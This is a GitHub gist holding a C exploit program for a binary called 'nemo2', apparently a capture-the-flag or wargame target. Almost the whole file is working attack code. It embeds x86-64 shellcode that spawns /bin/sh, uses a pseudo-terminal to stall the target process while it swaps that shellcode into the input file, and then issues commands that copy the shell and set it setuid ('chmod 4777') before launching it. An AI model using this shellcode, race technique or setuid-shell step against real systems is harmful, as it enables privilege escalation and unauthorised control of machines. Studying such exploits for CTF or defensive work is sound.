Created
June 24, 2015 08:40
-
-
Save saelo/53209bd6de2c618f60be to your computer and use it in GitHub Desktop.
Exploit for nemo2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| #include <stdlib.h> | |
| #include <errno.h> | |
| #include <signal.h> | |
| #include <pty.h> | |
| #include <sys/types.h> | |
| #include <sys/stat.h> | |
| #include <fcntl.h> | |
| char buf[0x10000]; | |
| // ./nemo2 input | wc | |
| #define CHILD_OUTPUT_LEN 113 | |
| char sc[] = | |
| "\x48\x31\xd2" // xor %rdx, %rdx | |
| "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622f2f, %rbx | |
| "\x48\xc1\xeb\x08" // shr $0x8, %rbx | |
| "\x53" // push %rbx | |
| "\x48\x89\xe7" // mov %rsp, %rdi | |
| "\x50" // push %rax | |
| "\x57" // push %rdi | |
| "\x48\x89\xe6" // mov %rsp, %rsi | |
| "\xb0\x3b" // mov $0x3b, %al | |
| "\x0f\x05\x00"; // syscall | |
| void die(const char* msg) | |
| { | |
| fprintf(stderr, "[-] %s: %s\n", msg, strerror(errno)); | |
| exit(-1); | |
| } | |
| int main() | |
| { | |
| int master, slave; | |
| system("cp input in"); | |
| puts("[*] Opening PTY to connect child to..."); | |
| if (openpty(&master, &slave, NULL, NULL, NULL)) { | |
| die("openpty"); | |
| } | |
| puts("[*] Done. Now filling pipe so child will block when writing to it..."); | |
| int flags = fcntl(slave, F_GETFL, 0); | |
| fcntl(slave, F_SETFL, flags | O_NONBLOCK); | |
| while(write(slave, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", 50) > 0); | |
| fcntl(slave, F_SETFL, flags & ~O_NONBLOCK); | |
| read(master, buf, CHILD_OUTPUT_LEN-1); | |
| puts("[*] Pipe filled, spawning child now..."); | |
| int pid = fork(); | |
| if (pid < 0) { | |
| die("fork"); | |
| } else if (pid == 0) { | |
| dup2(slave, 0); | |
| dup2(slave, 1); | |
| close(2); | |
| execl("./nemo2", "nemo2", "./in", NULL); | |
| die("execve"); | |
| } | |
| puts("[*] Child spawned, waiting for it to block on (last) write..."); | |
| usleep(500000); | |
| puts("[*] Changing shellcode to do something useful..."); | |
| int fd = open("./in", O_RDWR); | |
| if (fd == -1) { | |
| die("open"); | |
| } | |
| write(fd, sc, strlen(sc)); | |
| close(fd); | |
| puts("[*] Done, clearing pipe now so child can continue..."); | |
| flags = fcntl(master, F_GETFL, 0); | |
| fcntl(master, F_SETFL, flags | O_NONBLOCK); | |
| while(read(master, buf, 0x10000) > 0); | |
| puts("[*] Pipe cleared, child should continue now"); | |
| //write(master, "touch pwned\r\n", 13); | |
| write(master, "cp /bin/sh .\r\n", 14); | |
| write(master, "chmod 4777 sh\r\n", 15); | |
| write(master, "exit\r\n", 6); | |
| waitpid(pid, 0, 0); | |
| puts("[+] All done, spawning shell!"); | |
| execl("./sh", "sh", NULL); | |
| die("execl"); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment